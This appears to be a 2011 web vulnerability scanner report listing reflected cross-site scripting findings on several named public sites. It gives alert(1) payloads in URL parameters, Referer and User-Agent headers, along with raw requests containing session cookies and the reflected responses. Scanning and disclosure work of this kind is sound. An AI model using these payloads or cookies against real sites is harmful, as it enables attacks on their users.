Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c14d--><script>alert(1)</script>ea57f7f43db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 3 is copied into an HTML comment. The payload c1940--><script>alert(1)</script>76ff7075169 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9e8a1--><script>alert(1)</script>9235d6443a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95846"-alert(1)-"09f37818470 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/challenge HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296945247431; s_cc=true; has_js=1; SESS5a5e2306769d28180c45e44dbead8572=5e9e534eeb2970f37ac9ef725e396b00; _chartbeat2=7eetxrpbruuu11xx; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; cf=1; Referer: http://www.google.com/search?hl=en&q=95846"-alert(1)-"09f37818470
Response (redirected)
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 22:48:20 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 22:48:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... veloper Challenge"; var wa_eCustom24 = ""; var wa_eCustom28="http://appdeveloper.intel.com/en-us/contest/developerchallenge";
var wa_custom11="http://www.google.com/search?hl=en&q=95846"-alert(1)-"09f37818470";
var wa_urlQueryString=""; var wa_reportSuites="intelappdeveloper,intelcorpsw"; var wa_trackDFA="n";
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5700"-alert(1)-"94552111633 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/join HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a5700"-alert(1)-"94552111633
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 21:51:12 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=f06d1ac0a36c5756f7a59d2610c9cc22; expires=Tue, 01-Mar-2011 01:24:31 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 21:51:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
var wa_custom43="User|Join|home"; var wa_eCustom24 = ""; var wa_eCustom28="http://appdeveloper.intel.com/en-us/join";
var wa_custom11="http://www.google.com/search?hl=en&q=a5700"-alert(1)-"94552111633";
var wa_urlQueryString=""; var wa_reportSuites="intelappdeveloper,intelcorpsw"; var wa_trackDFA="n";
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce49"><script>alert(1)</script>b71393fda3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9ce49"><script>alert(1)</script>b71393fda3d
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:05:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=9ce49"><script>alert(1)</script>b71393fda3d" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9be4<script>alert(1)</script>267a9949814 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c9be4<script>alert(1)</script>267a9949814
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:05:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>c9be4<script>alert(1)</script>267a9949814 - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9910"><script>alert(1)</script>a834ad17d4e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b9910"><script>alert(1)</script>a834ad17d4e Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=t3lqid2f5pl1cnycigzwhgb4; path=/; HttpOnly X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:01:58 GMT Connection: close Content-Length: 69448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b9910"><script>alert(1)</script>a834ad17d4e" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9cbb'-alert(1)-'d9026def35b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.218CKOWJ; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1296950890=1296947290; bpl1296950921=1296947321; videoID=expired; bpl1296950936=1296947336; j2playlist=5731; auto=expired; bpl1296950967=1296947367; playlist=5731; Referer: http://www.google.com/search?hl=en&q=e9cbb'-alert(1)-'d9026def35b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e676e'-alert(1)-'4f05ce07561 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/index.php HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748; Referer: http://www.google.com/search?hl=en&q=e676e'-alert(1)-'4f05ce07561
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40d83"-alert(1)-"2d8f5a16807 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06; Referer: http://www.google.com/search?hl=en&q=40d83"-alert(1)-"2d8f5a16807
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f3f"-alert(1)-"9628bc32550 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc32f"-alert(1)-"364a56e431a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cc32f"-alert(1)-"364a56e431a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d3d"-alert(1)-"dc60051143 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/&hl=en&client=ca-pub-6422417422167576&adU=www.RiminiStreet.com&adT=ImageAd&gl=US&usg=AFQjCNH5RnMJStR1tz53GbCMllXhLJ0M_g/ HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06; Referer: http://www.google.com/search?hl=en&q=92d3d"-alert(1)-"dc60051143
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 06 Feb 2011 16:05:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.1.6 Content-Length: 3983
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97a19"-alert(1)-"670bb88e8f4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /googlecse.html HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06; Referer: http://www.google.com/search?hl=en&q=97a19"-alert(1)-"670bb88e8f4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adad6"-alert(1)-"5522cfd1d64 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9677"-alert(1)-"60c757f6c00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665e0"-alert(1)-"9deb9b12562 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spacer.gif HTTP/1.1 Host: www.baselinemag.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=665e0"-alert(1)-"9deb9b12562 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sessioncookie=a3c496ee62329678ad4d9915421e3c06; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_cc=true; s_nr=1296998523669-New; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 06 Feb 2011 13:21:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.1.6 Content-Length: 3792
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9016"-alert(1)-"130c26df728 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Web-Services-Web-20-and-SOA/Smarter-Enterprise-and-NextGeneration-Web-Services/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=b9016"-alert(1)-"130c26df728
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 06 Feb 2011 16:07:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.1.6 Content-Length: 3798
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e14"-alert(1)-"988ac6d4176 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=b8e14"-alert(1)-"988ac6d4176
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56392"><script>alert(1)</script>cfd30f8fce5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=56392"><script>alert(1)</script>cfd30f8fce5
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf53"><script>alert(1)</script>366b0773325 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fbf53"><script>alert(1)</script>366b0773325
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9546b"-alert(1)-"7d7d000f081 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9546b"-alert(1)-"7d7d000f081
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f75d4"-alert(1)-"705dae51c79 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f75d4"-alert(1)-"705dae51c79
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b85"><script>alert(1)</script>dbf3a60c943 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=65b85"><script>alert(1)</script>dbf3a60c943
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f65"-alert(1)-"c511ed18c94 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
